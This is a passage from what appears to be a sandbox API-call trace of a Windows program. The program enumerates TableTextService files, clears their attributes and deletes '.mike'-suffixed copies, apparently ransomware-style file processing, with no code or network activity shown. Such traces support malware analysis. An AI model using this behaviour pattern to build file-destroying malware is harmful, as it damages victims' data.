lpOldMode=0x2af1ac) returned 1 [0101.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0101.365] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0101.365] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0101.365] CoTaskMemFree (pv=0x506980) [0101.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0101.366] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.366] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0101.366] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46672035, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x46672035, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x449faf50, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x5bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService.dll", cAlternateFileName="")) returned 1 [0101.366] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72d933d2, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0x72d933d2, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x6e10ff3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3f54, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceAmharic.txt", cAlternateFileName="")) returned 1 [0101.366] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72a73731, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0x72a73731, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x6e8340d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x136bf6, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceArray.txt", cAlternateFileName="")) returned 1 [0101.366] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e8340d, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x6e8340d, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x6f1b985, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xef486, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceDaYi.txt", cAlternateFileName="")) returned 1 [0101.367] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72ae5b48, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0x72ae5b48, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x72ada55, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x196b56, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceSimplifiedQuanPin.txt", cAlternateFileName="")) returned 1 [0101.367] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b57f5f, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0x72b57f5f, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x736c12b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x160e36, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceSimplifiedShuangPin.txt", cAlternateFileName="")) returned 1 [0101.367] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72ba4219, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0x72ba4219, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x742a801, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1b9fb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceSimplifiedZhengMa.txt", cAlternateFileName="")) returned 1 [0101.367] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72d6d275, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0x72d6d275, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x742a801, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xafa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceYi.txt", cAlternateFileName="")) returned 1 [0101.367] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0101.367] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0101.367] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0101.367] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0101.368] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0101.369] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adfa0) returned 1 [0101.369] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af09c) returned 1 [0101.369] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0101.369] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0101.369] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0101.369] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0101.370] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0101.370] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0101.370] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0101.370] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0101.370] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0101.370] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0101.370] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0101.370] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0101.371] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0101.373] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0101.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.373] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.377] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0101.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0101.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0101.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0101.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0101.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0101.378] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt", dwFileAttributes=0x80) returned 0 [0101.379] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b8) returned 1 [0101.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0b4) returned 1 [0101.380] DeleteFileW (lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt.mike" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextserviceamharic.txt.mike")) returned 1 [0101.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0101.384] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adfa0) returned 1 [0101.384] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af09c) returned 1 [0101.384] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0101.385] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0101.385] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0101.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0101.385] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0101.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0101.385] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0101.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0101.385] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0101.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0101.386] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0101.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0101.386] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0101.388] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0101.388] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.388] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.394] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.394] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.395] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.395] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.395] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.395] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.396] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.396] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.396] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.396] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.397] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.397] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.397] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.397] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.398] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.398] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.399] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.399] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.399] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.399] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.400] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.400] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.400] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.400] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.401] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.401] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.402] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.402] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.408] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.408] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.409] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.409] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.411] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.412] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.415] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.415] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.415] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.415] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.417] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.422] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.442] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.446] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.447] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.452] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.452] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.452] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.453] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.454] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.454] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.457] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.460] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.460] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.461] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.464] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.464] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.464] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.464] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.467] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.467] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.470] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.470] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.471] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.471] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.472] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.472] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.472] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.472] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.473] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0101.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0101.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0101.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0101.627] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceArray.txt", dwFileAttributes=0x80) returned 0 [0101.629] DeleteFileW (lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservicearray.txt.mike")) returned 1 [0101.633] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0101.781] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt", dwFileAttributes=0x80) returned 0 [0101.783] DeleteFileW (lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt.mike" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservicedayi.txt.mike")) returned 1 [0101.789] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, 